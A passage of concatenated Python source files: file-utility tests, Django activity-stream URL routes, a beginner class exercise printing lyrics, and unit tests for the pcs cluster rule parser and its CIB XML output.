vestibulum nibh. Curae curae primis vulputate adipiscing arcu ipsum suspendisse quam hymenaeos primis accumsan vestibulum. 
""" self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "wd") as f: f.write(data[:512]) with fileUtils.open_ex(srcPath, "r+d") as f: f.seek(512) f.write(data[512:]) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) class ChownTests(TestCaseBase): @testValidation.ValidateRunningAsRoot def test(self): targetId = 666 srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) fileUtils.chown(srcPath, targetId, targetId) stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == targetId) os.unlink(srcPath) @testValidation.ValidateRunningAsRoot def testNames(self): # I convert to some id because I have no # idea what users are defined and what # there IDs are apart from root tmpId = 666 srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) fileUtils.chown(srcPath, tmpId, tmpId) stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == tmpId) fileUtils.chown(srcPath, "root", "root") stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == 0) class CopyUserModeToGroupTests(TestCaseBase): MODE_MASK = 0777 # format: initialMode, expectedMode modesList = [ (0770, 0770), (0700, 0770), (0750, 0770), (0650, 0660), ] def testCopyUserModeToGroup(self): fd, path = tempfile.mkstemp() try: os.close(fd) for initialMode, expectedMode in self.modesList: os.chmod(path, initialMode) fileUtils.copyUserModeToGroup(path) self.assertEquals(os.stat(path).st_mode & self.MODE_MASK, expectedMode) finally: os.unlink(path)
meletakis/collato
esn/actstream/urls.py
try: from django.conf.urls import url, patterns except ImportError: from django.conf.urls.defaults import url, patterns from actstream import feeds from actstream import views from django.contrib.auth.decorators import login_required urlpatterns = patterns('actstream.views', # Syndication Feeds url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/atom/$', feeds.AtomObjectActivityFeed(), name='actstream_object_feed_atom'), url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', feeds.ObjectActivityFeed(), name='actstream_object_feed'), url(r'^feed/(?P<content_type_id>\d+)/atom/$', feeds.AtomModelActivityFeed(), name='actstream_model_feed_atom'), url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/as/$', feeds.ActivityStreamsObjectActivityFeed(), name='actstream_object_feed_as'), url(r'^feed/(?P<content_type_id>\d+)/$', feeds.ModelActivityFeed(), name='actstream_model_feed'), url(r'^feed/$', feeds.UserActivityFeed(), name='actstream_feed'), url(r'^feed/atom/$', feeds.AtomUserActivityFeed(), name='actstream_feed_atom'), # Follow/Unfollow API url(r'^follow/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', name='actstream_follow'), url(r'^follow_all/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', {'actor_only': False}, name='actstream_follow_all'), url(r'^unfollow/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', {'do_follow': False}, name='actstream_unfollow'), # Follower and Actor lists url(r'^followers/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'followers', name='actstream_followers'), url(r'^actors/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'actor', name='actstream_actor'), url(r'^actors/(?P<content_type_id>\d+)/$', 'model', name='actstream_model'), url(r'^new_wall_post/$', view=login_required (views.new_wall_post), name='new_wall_post'), url(r'^detail/(?P<action_id>\d+)/$', view=login_required(views.detail), name='actstream_detail'), url(r'^(?P<username>[-\w]+)/$', view=login_required 
(views.user), name='actstream_user'), url(r'^$', view=login_required (views.stream), name='actstream'), url(r'^new_group_post', view=login_required (views.new_group_post), name='new_group_post'), )
mshcruz/LearnPythonTheHardWay
ex40.py
class Song(object):
    """Hold a song's lyrics and print them on demand.

    Fix over the original: the Python-2-only ``print line`` statement is
    replaced with ``print(line)``, which behaves identically for a single
    argument on Python 2 and is also valid Python 3.
    """

    def __init__(self, lyrics):
        # lyrics: a sequence of strings, one lyric line each.
        self.lyrics = lyrics

    def sing_me_a_song(self):
        """Print every lyric line to stdout, one per line."""
        for line in self.lyrics:
            print(line)


happy_bday = Song(["Happy birthday to you",
                   "I don't want to get sued",
                   "So I'll stop right here"])

bulls_on_parade = Song(["They rally around tha family",
                        "With pockets full of shells"])

happy_bday.sing_me_a_song()

bulls_on_parade.sing_me_a_song()
tradej/pcs
pcs/test/test_rule.py
from __future__ import absolute_import import os import sys import shutil import unittest import xml.dom.minidom parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, parentdir) from pcs_test_functions import pcs,ac import rule empty_cib = "empty.xml" temp_cib = "temp.xml" class DateValueTest(unittest.TestCase): def testParse(self): for value, item in enumerate(rule.DateCommonValue.allowed_items, 1): self.assertEquals( str(value), rule.DateCommonValue("%s=%s" % (item, value)).parts[item] ) value = rule.DateCommonValue( "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 weeks=6 " "years=7 weekyears=8 moon=9" ) self.assertEquals("1", value.parts["hours"]) self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["weekdays"]) self.assertEquals("4", value.parts["yeardays"]) self.assertEquals("5", value.parts["months"]) self.assertEquals("6", value.parts["weeks"]) self.assertEquals("7", value.parts["years"]) self.assertEquals("8", value.parts["weekyears"]) self.assertEquals("9", value.parts["moon"]) value = rule.DateCommonValue("hours=1 monthdays=2 hours=3") self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["hours"]) value = rule.DateCommonValue(" hours=1 monthdays=2 hours=3 ") self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["hours"]) self.assertSyntaxError( "missing one of 'hours=', 'monthdays=', 'weekdays=', 'yeardays=', " "'months=', 'weeks=', 'years=', 'weekyears=', 'moon=' in date-spec", "", rule.DateSpecValue ) self.assertSyntaxError( "missing value after 'hours=' in date-spec", "hours=", rule.DateSpecValue ) self.assertSyntaxError( "missing =value after 'hours' in date-spec", "hours", rule.DateSpecValue ) self.assertSyntaxError( "unexpected 'foo=bar' in date-spec", "foo=bar", rule.DateSpecValue ) self.assertSyntaxError( "unexpected 'foo=bar' in date-spec", "hours=1 foo=bar", rule.DateSpecValue ) def testDurationValidate(self): for 
value, item in enumerate(rule.DateCommonValue.allowed_items, 1): self.assertEquals( str(value), rule.DateDurationValue("%s=%s" % (item, value)).parts[item] ) for item in rule.DateCommonValue.allowed_items: self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "foo"), "%s=foo" % item, rule.DateDurationValue ) self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "-1"), "%s=-1" % item, rule.DateDurationValue ) self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "2foo"), "%s=2foo" % item, rule.DateDurationValue ) def testDateSpecValidation(self): for item in rule.DateCommonValue.allowed_items: value = 1 self.assertEquals( str(value), rule.DateSpecValue("%s=%s" % (item, value)).parts[item] ) self.assertEquals( "%s-%s" % (value, value + 1), rule.DateSpecValue( "%s=%s-%s" % (item, value, value + 1) ).parts[item] ) self.assertEquals( "hours=9-16 weekdays=1-5", str(rule.DateSpecValue("hours=9-16 weekdays=1-5")) ) for item in rule.DateCommonValue.allowed_items: self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "foo"), "%s=foo" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "1-foo"), "%s=1-foo" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "foo-1"), "%s=foo-1" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "1-2-3"), "%s=1-2-3" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "2-1"), "%s=2-1" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid hours '24' in 'date-spec'", "hours=24", rule.DateSpecValue ) self.assertSyntaxError( "invalid monthdays '32' in 'date-spec'", "monthdays=32", rule.DateSpecValue ) self.assertSyntaxError( "invalid weekdays '8' in 'date-spec'", "weekdays=8", rule.DateSpecValue ) self.assertSyntaxError( "invalid yeardays '367' in 'date-spec'", "yeardays=367", rule.DateSpecValue ) self.assertSyntaxError( 
"invalid months '13' in 'date-spec'", "months=13", rule.DateSpecValue ) self.assertSyntaxError( "invalid weeks '54' in 'date-spec'", "weeks=54", rule.DateSpecValue ) self.assertSyntaxError( "invalid weekyears '54' in 'date-spec'", "weekyears=54", rule.DateSpecValue ) self.assertSyntaxError( "invalid moon '8' in 'date-spec'", "moon=8", rule.DateSpecValue ) self.assertSyntaxError( "invalid hours '12-8' in 'date-spec'", "hours=12-8", rule.DateSpecValue ) def assertSyntaxError(self, syntax_error, parts_string, value_class=None): value_class = value_class if value_class else rule.DateCommonValue self.assertRaises(rule.SyntaxError, value_class, parts_string) try: value_class(parts_string) except rule.SyntaxError as e: self.assertEquals(syntax_error, str(e)) class ParserTest(unittest.TestCase): def setUp(self): self.parser = rule.RuleParser() def testEmptyInput(self): self.assertRaises(rule.UnexpectedEndOfInput, self.parser.parse, []) def testSingleLiteral(self): self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 'in_range', " "'defined', 'not_defined', 'date-spec'", ["#uname"] ) self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 'in_range', " "'defined', 'not_defined', 'date-spec'", ["string", "node1"] ) def testSingleLiteralDatespec(self): self.assertEquals( "(date-spec (literal hours=1))", str(self.parser.parse(["date-spec", "hours=1"])) ) self.assertEquals( "(date-spec (literal hours=1-14 months=1 monthdays=20-30))", str(self.parser.parse([ "date-spec", "hours=1-14 months=1 monthdays=20-30" ])) ) self.assertUnexpectedEndOfInput(["date-spec"]) def testSimpleExpression(self): self.assertEquals( "(eq (literal #uname) (literal node1))", str(self.parser.parse(["#uname", "eq", "node1"])) ) self.assertEquals( "(ne (literal #uname) (literal node2))", str(self.parser.parse(["#uname", "ne", "node2"])) ) self.assertEquals( "(gt (literal int) (literal 123))", str(self.parser.parse(["int", "gt", "123"])) ) self.assertEquals( 
"(gte (literal int) (literal 123))", str(self.parser.parse(["int", "gte", "123"])) ) self.assertEquals( "(lt (literal int) (literal 123))", str(self.parser.parse(["int", "lt", "123"])) ) self.assertEquals( "(lte (literal int) (literal 123))", str(self.parser.parse(["int", "lte", "123"])) ) def testSimpleExpressionBad(self): self.assertSyntaxError( "unexpected 'eq'", ["eq"] ) self.assertUnexpectedEndOfInput(["#uname", "eq"]) self.assertSyntaxError( "unexpected 'node1'", ["#uname", "node1"] ) self.assertSyntaxError( "unexpected 'eq'", ["eq", "#uname"] ) self.assertSyntaxError( "unexpected 'eq'", ["eq", "lt"] ) self.assertSyntaxError( "unexpected 'string' before 'eq'", ["string", "#uname", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'date-spec' before 'eq'", ["date-spec", "hours=1", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'date-spec' after 'eq'", ["#uname", "eq", "date-spec", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' before 'eq'", ["duration", "hours=1", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'duration' after 'eq'", ["#uname", "eq", "duration", "hours=1"] ) def testDefinedExpression(self): self.assertEquals( "(defined (literal pingd))", str(self.parser.parse(["defined", "pingd"])) ) self.assertEquals( "(not_defined (literal pingd))", str(self.parser.parse(["not_defined", "pingd"])) ) def testDefinedExpressionBad(self): self.assertUnexpectedEndOfInput(["defined"]) self.assertUnexpectedEndOfInput(["not_defined"]) self.assertSyntaxError( "unexpected 'eq'", ["defined", "eq"] ) self.assertSyntaxError( "unexpected 'and'", ["defined", "and"] ) self.assertSyntaxError( "unexpected 'string' after 'defined'", ["defined", "string", "pingd"] ) self.assertSyntaxError( "unexpected 'date-spec' after 'defined'", ["defined", "date-spec", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' after 'defined'", ["defined", "duration", "hours=1"] ) def testTypeExpression(self): self.assertEquals( "(eq (literal #uname) (string 
(literal node1)))", str(self.parser.parse(["#uname", "eq", "string", "node1"])) ) self.assertEquals( "(eq (literal #uname) (integer (literal 12345)))", str(self.parser.parse(["#uname", "eq", "integer", "12345"])) ) self.assertEquals( "(eq (literal #uname) (integer (literal -12345)))", str(self.parser.parse(["#uname", "eq", "integer", "-12345"])) ) self.assertEquals( "(eq (literal #uname) (version (literal 1)))", str(self.parser.parse(["#uname", "eq", "version", "1"])) ) self.assertEquals( "(eq (literal #uname) (version (literal 1.2.3)))", str(self.parser.parse(["#uname", "eq", "version", "1.2.3"])) ) self.assertEquals( "(eq (literal #uname) (string (literal string)))", str(self.parser.parse(["#uname", "eq", "string", "string"])) ) self.assertEquals( "(eq (literal #uname) (string (literal and)))", str(self.parser.parse(["#uname", "eq", "string", "and"])) ) self.assertEquals( "(and " "(ne (literal #uname) (string (literal integer))) " "(ne (literal #uname) (string (literal version)))" ")", str(self.parser.parse([ "#uname", "ne", "string", "integer", "and", "#uname", "ne", "string", "version" ])) ) def testTypeExpressionBad(self): self.assertUnexpectedEndOfInput(["string"]) self.assertUnexpectedEndOfInput(["#uname", "eq", "string"]) self.assertSyntaxError( "unexpected 'string' before 'eq'", ["string", "#uname", "eq", "node1"] ) self.assertSyntaxError( "invalid integer value 'node1'", ["#uname", "eq", "integer", "node1"] ) self.assertSyntaxError( "invalid version value 'node1'", ["#uname", "eq", "version", "node1"] ) def testDateExpression(self): self.assertEquals( "(gt (literal date) (literal 2014-06-26))", str(self.parser.parse(["date", "gt", "2014-06-26"])) ) self.assertEquals( "(lt (literal date) (literal 2014-06-26))", str(self.parser.parse(["date", "lt", "2014-06-26"])) ) self.assertEquals( "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "2014-07-26" ])) ) 
self.assertEquals( "(in_range " "(literal date) " "(literal 2014-06-26) (duration (literal years=1))" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "duration", "years=1" ])) ) def testDateExpressionBad(self): self.assertUnexpectedEndOfInput( ["date", "in_range"] ) self.assertSyntaxError( "missing 'to'", ["date", "in_range", '2014-06-26'] ) self.assertUnexpectedEndOfInput( ["date", "in_range", "2014-06-26", "to"] ) self.assertSyntaxError( "unexpected 'in_range'", ["in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "expecting 'to', got 'eq'", ["date", "in_range", '#uname', "eq", "node1", "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '#uname' in 'in_range ... to'", ["date", "in_range", "2014-06-26", "to", '#uname', "eq", "node1"] ) self.assertSyntaxError( "unexpected 'defined' after 'in_range'", ["date", "in_range", "defined", "pingd", "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'defined' after 'in_range ... to'", ["date", "in_range", "2014-06-26", "to", "defined", "pingd"] ) self.assertSyntaxError( "unexpected 'string' before 'in_range'", ["string", "date", "in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after 'in_range'", ["date", "in_range", "string", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after 'in_range ... to'", ["date", "in_range", '2014-06-26', "to", "string", "2014-07-26"] ) self.assertSyntaxError( "unexpected 'string' after '2014-06-26'", ["date", "in_range", '2014-06-26', "string", "to", "2014-07-26"] ) self.assertSyntaxError( "unexpected '#uname' before 'in_range'", ["#uname", "in_range", '2014-06-26', "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '2014-13-26' in 'in_range ... to'", ["date", "in_range", '2014-13-26', "to", "2014-07-26"] ) self.assertSyntaxError( "invalid date '2014-13-26' in 'in_range ... 
to'", ["date", "in_range", '2014-06-26', "to", "2014-13-26"] ) def testAndOrExpression(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2" ])) ) self.assertEquals( "(or " "(eq (literal #uname) (literal node1)) " "(eq (literal #uname) (literal node2))" ")", str(self.parser.parse([ "#uname", "eq", "node1", "or", "#uname", "eq", "node2" ])) ) self.assertEquals( "(and " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(ne (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "and", "#uname", "ne", "node3" ])) ) self.assertEquals( "(or " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(eq (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "or", "#uname", "eq", "node3" ])) ) self.assertEquals( "(and " "(or " "(eq (literal #uname) (literal node1)) " "(eq (literal #uname) (literal node2))" ") " "(ne (literal #uname) (literal node3))" ")", str(self.parser.parse([ "#uname", "eq", "node1", "or", "#uname", "eq", "node2", "and", "#uname", "ne", "node3" ])) ) self.assertEquals( "(and " "(defined (literal pingd)) " "(lte (literal pingd) (literal 1))" ")", str(self.parser.parse([ "defined", "pingd", "and", "pingd", "lte", "1" ])) ) self.assertEquals( "(or " "(gt (literal pingd) (literal 1)) " "(not_defined (literal pingd))" ")", str(self.parser.parse([ "pingd", "gt", "1", "or", "not_defined", "pingd" ])) ) def testAndOrExpressionDateSpec(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(date-spec (literal hours=1-12))" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "date-spec", "hours=1-12" ])) ) self.assertEquals( "(or " "(date-spec (literal monthdays=1-12)) " "(ne 
(literal #uname) (literal node1))" ")", str(self.parser.parse([ "date-spec", "monthdays=1-12", "or", "#uname", "ne", "node1" ])) ) self.assertEquals( "(or " "(date-spec (literal monthdays=1-10)) " "(date-spec (literal monthdays=11-20))" ")", str(self.parser.parse([ "date-spec", "monthdays=1-10", "or", "date-spec", "monthdays=11-20" ])) ) def testAndOrExpressionDate(self): self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "date", "in_range", "2014-06-26", "to", "2014-07-26" ])) ) self.assertEquals( "(and " "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ") " "(ne (literal #uname) (literal node1))" ")", str(self.parser.parse([ "date", "in_range", "2014-06-26", "to", "2014-07-26", "and", "#uname", "ne", "node1" ])) ) def testAndOrExpressionBad(self): self.assertSyntaxError( "unexpected 'and'", ["and"] ) self.assertSyntaxError( "unexpected 'or'", ["or"] ) self.assertSyntaxError( "unexpected '#uname' before 'and'", ["#uname", "and", "node1"] ) self.assertSyntaxError( "unexpected '#uname' before 'or'", ["#uname", "or", "node1"] ) self.assertSyntaxError( "unexpected '#uname' before 'or'", ["#uname", "or", "eq"] ) self.assertSyntaxError( "unexpected 'node2' after 'and'", ["#uname", "eq", "node1", "and", "node2"] ) self.assertUnexpectedEndOfInput(["#uname", "eq", "node1", "and"]) self.assertUnexpectedEndOfInput( ["#uname", "eq", "node1", "and", "#uname", "eq"] ) self.assertSyntaxError( "unexpected 'and'", ["and", "#uname", "eq", "node1"] ) self.assertSyntaxError( "unexpected 'duration' after 'and'", ["#uname", "ne", "node1", "and", "duration", "hours=1"] ) self.assertSyntaxError( "unexpected 'duration' before 'or'", ["duration", "monthdays=1", "or", "#uname", "ne", "node1"] ) def testParenthesizedExpression(self): self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 
'in_range', " "'defined', 'not_defined', 'date-spec'", ["(", "#uname", ")"] ) self.assertEquals( "(date-spec (literal hours=1))", str(self.parser.parse(["(", "date-spec", "hours=1", ")"])) ) self.assertEquals( "(eq (literal #uname) (literal node1))", str(self.parser.parse(["(", "#uname", "eq", "node1", ")"])) ) self.assertEquals( "(defined (literal pingd))", str(self.parser.parse(["(", "defined", "pingd", ")"])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", ")", "and", "(", "#uname", "ne", "node2", ")" ])) ) self.assertEquals( "(or " "(and " "(ne (literal #uname) (literal node1)) " "(ne (literal #uname) (literal node2))" ") " "(eq (literal #uname) (literal node3))" ")", str(self.parser.parse([ "(", "#uname", "ne", "node1", "and", "#uname", "ne", "node2", ")", "or", "#uname", "eq", "node3" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(or " "(ne (literal #uname) (literal node2)) " "(eq (literal #uname) (literal node3))" ")" ")", str(self.parser.parse([ "#uname", "ne", "node1", "and", "(", "#uname", "ne", "node2", "or", "#uname", "eq", "node3", ")" ])) ) self.assertEquals( "(and " "(ne (literal #uname) (literal node1)) " "(or " "(ne (literal #uname) (literal node2)) " "(eq (literal #uname) (literal node3))" ")" ")", str(self.parser.parse([ "(", "(", "(", "#uname", "ne", "node1", ")", "and", "(", "(", "(", "#uname", "ne", "node2", ")", "or", "(", "#uname", "eq", "node3", ")", ")", ")", ")", ")" ])) ) self.assertEquals( "(in_range " "(literal date) (literal 2014-06-26) (literal 2014-07-26)" ")", str(self.parser.parse([ "(", "date", "in_range", "2014-06-26", "to", "2014-07-26", ")" ])) ) def 
testParenthesizedExpressionBad(self): self.assertUnexpectedEndOfInput(["("]) self.assertSyntaxError( "unexpected ')'", ["(", ")"] ) self.assertSyntaxError( "missing ')'", ["(", "#uname"] ) self.assertUnexpectedEndOfInput(["(", "#uname", "eq"]) self.assertSyntaxError( "missing ')'", ["(", "#uname", "eq", "node1"] ) def assertUnexpectedEndOfInput(self, program): self.assertRaises(rule.UnexpectedEndOfInput, self.parser.parse, program) def assertSyntaxError(self, syntax_error, program): self.assertRaises( rule.SyntaxError, self.parser.parse, program ) try: self.parser.parse(program) except rule.SyntaxError as e: self.assertEquals(syntax_error, str(e)) class CibBuilderTest(unittest.TestCase): def setUp(self): self.parser = rule.RuleParser() self.builder = rule.CibBuilder() def testSingleLiteralDatespec(self): self.assertExpressionXml( ["date-spec", "hours=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec hours="1" id="location-dummy-rule-expr-datespec"/> </date_expression> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date-spec", "hours=1-14 monthdays=20-30 months=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="date_spec"> <date_spec hours="1-14" id="location-dummy-rule-expr-datespec" monthdays="20-30" months="1"/> </date_expression> </rule> </rsc_location> """ ) def testSimpleExpression(self): self.assertExpressionXml( ["#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "ne", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> </rule> 
</rsc_location> """ ) self.assertExpressionXml( ["#uname", "gt", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="gt" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "gte", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="gte" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "lt", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="lt" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "lte", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="lte" value="node1"/> </rule> </rsc_location> """ ) def testTypeExpression(self): self.assertExpressionXml( ["#uname", "eq", "string", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="string" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "integer", "12345"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="number" value="12345"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "version", "1.2.3"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" type="version" value="1.2.3"/> </rule> </rsc_location> """ ) def testDefinedExpression(self): self.assertExpressionXml( ["defined", "pingd"], """ <rsc_location id="location-dummy"> <rule 
id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="defined"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["not_defined", "pingd"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="pingd" id="location-dummy-rule-expr" operation="not_defined"/> </rule> </rsc_location> """ ) def testDateExpression(self): self.assertExpressionXml( ["date", "gt", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="gt" start="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "lt", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression end="2014-06-26" id="location-dummy-rule-expr" operation="lt"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "in_range", "2014-06-26", "to", "2014-07-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression end="2014-07-26" id="location-dummy-rule-expr" operation="in_range" start="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "in_range", "2014-06-26", "to", "duration", "years=1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <date_expression id="location-dummy-rule-expr" operation="in_range" start="2014-06-26"> <duration id="location-dummy-rule-expr-duration" years="1"/> </date_expression> </rule> </rsc_location> """ ) def testNotDateExpression(self): self.assertExpressionXml( ["date", "eq", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="eq" value="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "string", "2014-06-26"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" 
id="location-dummy-rule-expr" operation="gt" type="string" value="2014-06-26"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "integer", "12345"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="gt" type="number" value="12345"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["date", "gt", "version", "1.2.3"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule"> <expression attribute="date" id="location-dummy-rule-expr" operation="gt" type="version" value="1.2.3"/> </rule> </rsc_location> """ ) def testAndOrExpression(self): self.assertExpressionXml( ["#uname", "ne", "node1", "and", "#uname", "ne", "node2"], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["#uname", "eq", "node1", "or", "#uname", "eq", "node2"], """ <rsc_location id="location-dummy"> <rule boolean-op="or" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="eq" value="node2"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ "#uname", "ne", "node1", "and", "#uname", "ne", "node2", "and", "#uname", "ne", "node3" ], """ <rsc_location id="location-dummy"> <rule boolean-op="and" id="location-dummy-rule"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="ne" value="node1"/> <expression attribute="#uname" id="location-dummy-rule-expr-1" operation="ne" value="node2"/> <expression attribute="#uname" id="location-dummy-rule-expr-2" operation="ne" value="node3"/> </rule> </rsc_location> """ ) self.assertExpressionXml( [ 
